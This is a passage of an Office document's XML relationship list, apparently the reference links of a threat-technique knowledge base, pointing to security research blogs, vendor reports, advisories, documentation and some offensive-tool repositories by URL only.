Target="https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" TargetMode="External"/><Relationship Id="rId2177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/" TargetMode="External"/><Relationship Id="rId2384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu" TargetMode="External"/><Relationship Id="rId2591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://home.treasury.gov/news/press-releases/sm845" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/usao-sdny/press-release/file/1045781/download" TargetMode="External"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://seclists.org/fulldisclosure/2015/Dec/34" TargetMode="External"/><Relationship Id="rId1193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware" TargetMode="External"/><Relationship Id="rId2037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" TargetMode="External"/><Relationship Id="rId2244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/" TargetMode="External"/><Relationship Id="rId2451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99" TargetMode="External"/><Relationship Id="rId2689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/r0wdy_/status/936365549553991680" TargetMode="External"/><Relationship Id="rId2896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/" TargetMode="External"/><Relationship Id="rId868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html" TargetMode="External"/><Relationship Id="rId1053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1" TargetMode="External"/><Relationship Id="rId1260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/keychain_services" TargetMode="External"/><Relationship Id="rId1498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4" TargetMode="External"/><Relationship Id="rId2104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" TargetMode="External"/><Relationship Id="rId2549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId2756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/" TargetMode="External"/><Relationship Id="rId2963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/create-symbolic-links" TargetMode="External"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/get-started/overview/" TargetMode="External"/><Relationship Id="rId728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" TargetMode="External"/><Relationship Id="rId935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" TargetMode="External"/><Relationship Id="rId1358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications" TargetMode="External"/><Relationship Id="rId1565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" TargetMode="External"/><Relationship Id="rId1772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" TargetMode="External"/><Relationship Id="rId2311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/" TargetMode="External"/><Relationship Id="rId2409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" TargetMode="External"/><Relationship Id="rId2616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.uefi.org/about" TargetMode="External"/><Relationship Id="rId1120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/" TargetMode="External"/><Relationship Id="rId1218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-flame-questions-and-answers-51/34344/" TargetMode="External"/><Relationship Id="rId1425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/" TargetMode="External"/><Relationship Id="rId2823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/" TargetMode="External"/><Relationship Id="rId1632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" TargetMode="External"/><Relationship Id="rId1937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x68.html" TargetMode="External"/><Relationship Id="rId3085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x59.html" TargetMode="External"/><Relationship Id="rId2199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers" TargetMode="External"/><Relationship Id="rId3012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.real-world-systems.com/docs/launchdPlist.1.html" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation" TargetMode="External"/><Relationship Id="rId792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf" TargetMode="External"/><Relationship Id="rId2059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread" TargetMode="External"/><Relationship Id="rId2266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/copper-fieldstone" TargetMode="External"/><Relationship Id="rId2473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/" TargetMode="External"/><Relationship Id="rId2680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/aadinternals/" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/" TargetMode="External"/><Relationship Id="rId652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf" TargetMode="External"/><Relationship Id="rId1075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/sdk/gcloud/reference/compute/instances/list" TargetMode="External"/><Relationship Id="rId1282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/concepts/overview/kubernetes-api/" TargetMode="External"/><Relationship Id="rId2126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" TargetMode="External"/><Relationship Id="rId2333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.smartmontools.org/" TargetMode="External"/><Relationship Id="rId2540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc771046(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId2778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" TargetMode="External"/><Relationship Id="rId2985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/operation-cobalt-kitty-apt" TargetMode="External"/><Relationship Id="rId957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.google.com/cloudidentity/answer/7332836?hl=en&amp;ref_topic=7558554" TargetMode="External"/><Relationship Id="rId1142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html" TargetMode="External"/><Relationship Id="rId1587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces" TargetMode="External"/><Relationship Id="rId1794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test" TargetMode="External"/><Relationship Id="rId2400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" TargetMode="External"/><Relationship Id="rId2638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/" TargetMode="External"/><Relationship Id="rId2845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://skanthak.homepage.t-online.de/sentinel.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" TargetMode="External"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" TargetMode="External"/><Relationship Id="rId1002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/muraenateam/muraena" TargetMode="External"/><Relationship Id="rId1447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fevGZs0EQu8" TargetMode="External"/><Relationship Id="rId1654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)" TargetMode="External"/><Relationship Id="rId1861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2018/11/08/rokrat-analysis/" TargetMode="External"/><Relationship Id="rId2705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise" TargetMode="External"/><Relationship Id="rId2912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/" TargetMode="External"/><Relationship Id="rId1307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Verclsid/" TargetMode="External"/><Relationship Id="rId1514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed" TargetMode="External"/><Relationship Id="rId1721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" TargetMode="External"/><Relationship Id="rId1959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/federation-vulnerability/" TargetMode="External"/><Relationship Id="rId1819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/scripting/winscript/windows-script-interfaces" TargetMode="External"/><Relationship Id="rId2190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh" TargetMode="External"/><Relationship Id="rId2288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack" TargetMode="External"/><Relationship Id="rId2495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2020/10/poetrat-update.html" TargetMode="External"/><Relationship Id="rId3034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" TargetMode="External"/><Relationship Id="rId1097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf" TargetMode="External"/><Relationship Id="rId2050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" TargetMode="External"/><Relationship Id="rId2148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rewterz.com/articles/analysis-on-sidewinder-apt-group-covid-19" TargetMode="External"/><Relationship Id="rId674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" TargetMode="External"/><Relationship Id="rId881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" TargetMode="External"/><Relationship Id="rId979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vblocalhost.com/uploads/VB2021-Slowik.pdf" TargetMode="External"/><Relationship Id="rId2355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://heyoka.sourceforge.net/" TargetMode="External"/><Relationship Id="rId2562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/security/ms14-068.aspx" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" TargetMode="External"/><Relationship Id="rId741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" TargetMode="External"/><Relationship Id="rId839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" TargetMode="External"/><Relationship Id="rId1164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/" TargetMode="External"/><Relationship Id="rId1371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms536471.aspx" TargetMode="External"/><Relationship Id="rId1469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" TargetMode="External"/><Relationship Id="rId2008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/" TargetMode="External"/><Relationship Id="rId2215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/bronze-union" TargetMode="External"/><Relationship Id="rId2422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf" TargetMode="External"/><Relationship Id="rId2867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatures" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://home.treasury.gov/news/press-releases/sm1127" TargetMode="External"/><Relationship Id="rId1024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard" TargetMode="External"/><Relationship Id="rId1231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/faq-the-projectsauron-apt/75533/" TargetMode="External"/><Relationship Id="rId1676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts" TargetMode="External"/><Relationship Id="rId1883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF" TargetMode="External"/><Relationship Id="rId2727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" TargetMode="External"/><Relationship Id="rId2934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html" TargetMode="External"/><Relationship Id="rId906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" TargetMode="External"/><Relationship Id="rId1329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/inter-process-communication-ipc/" TargetMode="External"/><Relationship Id="rId1536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" TargetMode="External"/><Relationship Id="rId1743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes" TargetMode="External"/><Relationship Id="rId1950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" TargetMode="External"/><Relationship Id="rId1603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/" TargetMode="External"/><Relationship Id="rId1810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" TargetMode="External"/><Relationship Id="rId3056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ryhanson/phishery" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" TargetMode="External"/><Relationship Id="rId1908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/nt/nltest.html" TargetMode="External"/><Relationship Id="rId2072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=wQ1CuAPnrLM&amp;feature=youtu.be&amp;t=2815" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/" TargetMode="External"/><Relationship Id="rId696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf" TargetMode="External"/><Relationship Id="rId2377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/" TargetMode="External"/><Relationship Id="rId2584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/" TargetMode="External"/><Relationship Id="rId2791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" TargetMode="External"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.coretechnologies.com/blog/windows-services/eventlog/" TargetMode="External"/><Relationship Id="rId1186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thesafemac.com/new-signed-malware-called-janicab/" TargetMode="External"/><Relationship Id="rId1393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" TargetMode="External"/><Relationship Id="rId2237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" TargetMode="External"/><Relationship Id="rId2444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks" TargetMode="External"/><Relationship Id="rId2889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.winzip.com/win/en/" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ampliasecurity.com/research/wcefaq.html" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cobaltstrike.com/help-scripted-web-delivery" TargetMode="External"/><Relationship Id="rId970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/split/" TargetMode="External"/><Relationship Id="rId1046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 